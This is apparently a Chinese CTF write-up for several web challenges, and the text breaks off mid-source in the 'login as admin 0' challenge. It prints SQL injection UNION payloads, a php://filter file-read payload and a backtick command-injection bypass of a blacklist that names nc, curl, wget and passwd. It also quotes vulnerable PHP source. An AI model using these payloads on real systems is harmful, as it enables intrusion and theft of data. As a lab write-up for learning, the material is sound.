oj说了不要直接给flag,所以就只写思路啦~
hide and seek
源码就有了
Guestbook
这题是SQL注入
看数据库
?mod=read&id=-1 union select 1,2,database(),4#
然后就看到数据库是g8
表
?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1),4#
看到flag表
字段
?mod=read&id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4#
看到flag字段
最后就看flag的值了
?mod=read&id=-1 union select 1,2,(select flag from flag limit 1,1),4#
LFI
题目已经提示了是php://filter伪协议,进入看到要访问flag文件
?page=php://filter/read=convert.base64-encode/resource=pages/flag
读出来一串base64,解密看到config
再去看下config
?page=php://filter/read=convert.base64-encode/resource=pages/config
解密一下就能看到flag了
homepage
看源码,有个flag,但却是第一题的,再找,看到cute.js,继续看看,看到一堆aaencode,解密得到一个二维码,扫一扫就有flag了
ping
源码
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ping</title>
</head>
<body>
<form action="." method="GET">
IP: <input type="text" name="ip"> <input type="submit" value="Ping">
</form>
<pre><?php
$blacklist = [
'flag', 'cat', 'nc', 'sh', 'cp', 'touch', 'mv', 'rm', 'ps', 'top', 'sleep', 'sed',
'apt', 'yum', 'curl', 'wget', 'perl', 'python', 'zip', 'tar', 'php', 'ruby', 'kill',
'passwd', 'shadow', 'root',
'z',
'dir', 'dd', 'df', 'du', 'free', 'tempfile', 'touch', 'tee', 'sha', 'x64', 'g',
'xargs', 'PATH',
'$0', 'proc',
'/', '&', '|', '>', '<', ';', '"', '\'', '\\', "\n"
];
set_time_limit(2);
function ping($ip) {
global $blacklist;
if(strlen($ip) > 15) {
return 'IP toooooo longgggggggggg';
} else {
foreach($blacklist as $keyword) {
if(strstr($ip, $keyword)) {
return "{$keyword} not allowed";
}
}
$ret = [];
exec("ping -c 1 \"{$ip}\" 2>&1", $ret);
return implode("\n", array_slice($ret, 0, 10));
}
}
if(!empty($_GET['ip']))
echo htmlentities(ping($_GET['ip']));
else
highlight_file(__FILE__);
?></pre>
</body>
</html>
看到有黑名单,过滤了很多东西,引号都过滤了,但是反引号没有过滤,试下?ip=`ls`
看到flag.php和index.php,但是cat又不能用,linux还有一个sort,能将文件进行排序输出,试下sort加通配符
?ip=`sort ????????`
然后就看到flag了
scoreboard
在网页找了一会没找到,最后终于在响应头找到flag了
login as admin 0
源码
<?php
require('config.php');
// table schema
// user -> id, user, password, is_admin
if($_GET['show_source'] === '1') {
highlight_file(__FILE__);
exit;
}
function safe_filter($str)
{
$strl = strtolower($str);
if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
strstr($strl, 'update') || strstr($strl, 'delete')
) {
return '';
}
return str_replace("'", "\\'", $str);
}
$_POST = array_map(safe_filter, $_POST);
$user = null;
// connect to database
if(!empty($_POST['name']) && !empty($_POST['password'])) {
$connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
$db = new PDO($connection_string, DB_USER, DB_PASS);
$sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
$_POST['name'],
$_POST['password']
);
try {
$query = $db->query($sql);
if($query) {
$user = $query->fetchObject();
} else {
$user = false;
}
} catch(Exception $e) {
$user = false;
}
}
?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Login As Admin 0</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
<div class="jumbotron">
<div class="container">
<h1>Login as Admin 0</h1>
</div>
</div>
<div class="container">
<div class="navbar">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="/">Please Hack Me</a>
</div>
<ul class="nav navbar-nav">
<li>
<a href="/scoreboard">Scoreboard</a>
</li>
<li>
<a href="?show_source=1" target="_blank">Source Code</a>
</li>
</ul>
</div>
</div>
</div>
<div class="container">
<div class="col-md-6 col-md-offset-3">
<?php if(!$user):